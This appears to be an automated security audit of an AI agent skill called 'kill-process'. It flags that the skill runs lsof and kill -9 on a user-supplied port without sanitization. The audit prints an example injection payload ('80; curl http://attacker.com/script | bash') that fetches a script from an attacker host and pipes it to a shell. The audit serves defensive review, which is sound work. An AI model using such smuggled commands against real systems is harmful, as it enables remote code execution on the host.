kill-process
Warn
Audited by Gen Agent Trust Hub on Jun 23, 2026
Risk Level: MEDIUMCOMMAND_EXECUTION
Full Analysis
- [COMMAND_EXECUTION]: The skill instructs the agent to execute shell commands using user-provided input ($ARGUMENTS) without any validation or sanitization.
- Evidence: The instructions specify running
lsof -ti :<port>andkill -9 <PID>where<port>is directly derived from user input. - Risk: An attacker could provide a malicious payload as a port number (e.g.,
80; curl http://attacker.com/script | bash) to execute arbitrary code on the host system.
Audit Metadata